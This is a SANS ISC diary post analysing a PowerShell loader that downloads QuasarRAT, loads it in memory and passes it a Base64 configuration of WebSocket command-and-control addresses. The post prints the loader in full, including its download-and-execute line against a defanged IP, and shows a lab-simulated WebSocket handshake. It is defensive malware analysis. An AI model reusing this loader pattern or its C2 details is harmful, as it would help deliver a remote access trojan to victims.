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Keep an Eye on WebSockets

Published: 2022-03-11. Last Updated: 2022-03-11 09:17:07 UTC
by Xavier Mertens (Version: 1)
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It has been a while that I did not spot WebSockets used by malware. Yesterday I discovered an interesting piece of Powershell. Very small and almost undetected according to its Virustotal score (2/54)[1]. A quick reminder for those that don't know what a "WebSocket" is. When you perform a classic HTTP request to a server, it replies with some data and closes the connection. WebSockets make the client/server push messages at any time without any relation to a previous request. Compared to HTTP, they allow bi-directional protocols, full-duplex and, over a single TCP connection.

The script is coming from China (the filename contains Chinese characters and means "New Text Document.ps1". I had a look at the downloaded malware that contains a lot of Chinese characters:

The Powershell script is very simple:

$_0000 = 0
while($_0000 -lt 16)
$_0001 =(new-object net.webclient).DownloadData('hxxp://185[.]112[.]144[.]245/a/data')
$_0002 =[System.Reflection.Assembly]::Load($_0001)
$_0003 = $_0002.EntryPoint

[string[]] $_0004 = @("CiN3czovL3d3dzguYWR2YjlmeXhsZjJ2LmNvbToxMjM0NS93cwojd3M6Ly93d3c3LmFkdmI5Znl4bGYydi5jb206MTIzNDUvd3MKI3dzOi8vd3d3Ni5hZHZiOWZ5eGxmMnYuY29tOjEyMzQ1L3dzCiN3czovL3d3dzUuYWR2YjlmeXhsZjJ2LmNvbToxMjM0NS93cwojd3M6Ly93d3c0LmFkdmI5Znl4bGYydi5jb206MTIzNDUvd3MKI3dzOi8vd3d3My5hZHZiOWZ5eGxmMnYuY29tOjEyMzQ1L3dzCiN3czovL3d3dzIuYWR2YjlmeXhsZjJ2LmNvbToxMjM0NS93cwoid3M6Ly93d3cuYWR2YjlmeXhsZjJ2LmNvbToxMjM0NS93cxLzATxSU0FLZXlWYWx1ZT48TW9kdWx1cz5zTjMrY3M1UWFwUGFGbVFvbldaOENyK0QvOS9PK3ZwQXpJNUErYW1BZWFuZDltNUxsVGFLYnAvUU1uL3RBODExQ2VjU1BPTFlGdk1uZ3pMaWF0aHRiRmdqV0h1UlFSNzRmUlJiSk85cUVsQU9XYUZONnJIY1ZteGp2MDlOSFJ1YzJSMlowQ2JoNnJ6SkFzK0k0MTdYdkhaczh6dGxCQk9sYmtFNjBYWlc1YUU9PC9Nb2R1bHVzPjxFeHBvbmVudD5BUUFCPC9FeHBvbmVudD48L1JTQUtleVZhbHVlPhoXR2xvYmFsXFZTOGJkdmRpSzdBblJWQTI=")
[Object[]] $_0005 = @(, $_0004)

$_0003.Invoke($_0006, $_0005)
sleep 5

The DownloadData() fetches a PE file (SHA256:76e3a97d5bde3a99397d73fa4463e2ca7f966b0f7b0478063f8993ee07c8cc89/detection)[2]. This is a sample of QuasarRAT[3]. The configuration is passed via the Base64-encode data:


All ws:// URLs resolve to the same IP address ( but it seems down at this time so I simulated the server in my lab:

GET /ws HTTP/1.1
User-Agent: websocket-sharp/1.0
Host: www3[.]advb9fyxlf2v[.]com:12345
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: oiIidMOCwZD/IpeCwIp81A==
Sec-WebSocket-Version: 13

It could be a good idea to keep an eye on WebSockets, there is an interesting SANS white paper about this topic[4].


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

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